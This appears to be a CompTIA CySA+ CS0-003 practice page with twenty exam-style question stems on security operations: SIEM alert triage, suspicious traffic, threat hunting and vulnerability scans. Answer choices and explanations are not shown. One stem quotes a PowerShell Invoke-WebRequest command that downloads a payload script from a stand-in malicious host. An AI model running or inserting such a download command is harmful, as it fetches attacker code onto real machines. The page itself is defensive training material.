CS0-003 · topic practice

Security Operations practice questions

Practise CompTIA CySA+ CS0-003 Security Operations practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Reviewed byJohnson Ajibi· MSc IT Security
20 questionsDomain: Security Operations

What the exam tests

What to know about Security Operations

Security Operations questions test whether you can apply the concept in context, not just recognise a definition.

How the topic appears in realistic exam-style scenarios.

Which detail in the question changes the correct answer.

How to eliminate plausible but wrong options.

How to connect the question back to the wider exam objective.

Watch out for

Common Security Operations exam traps

  • Answering from memory before reading the full scenario.
  • Missing a constraint such as cost, availability, security, scope or command context.
  • Choosing a broad answer when the question asks for the most specific fix.
  • Ignoring why the wrong options are tempting.

Practice set

Security Operations questions

20 questions · select your answer, then reveal the explanation

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused Security Operations sessions

Start a Security Operations only practice session

Every question in these sessions is drawn from the Security Operations domain — nothing else.

Related practice questions

Related CS0-003 topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the CS0-003 exam test about Security Operations?
Security Operations questions test whether you can apply the concept in context, not just recognise a definition.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just Security Operations questions in a focused session?
Yes — the session launcher on this page draws every question from the Security Operations domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other CS0-003 topics?
Use the topic links above to move to related areas, or go back to the CS0-003 question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the CS0-003 exam covers. They are not copied from any real exam or dump site.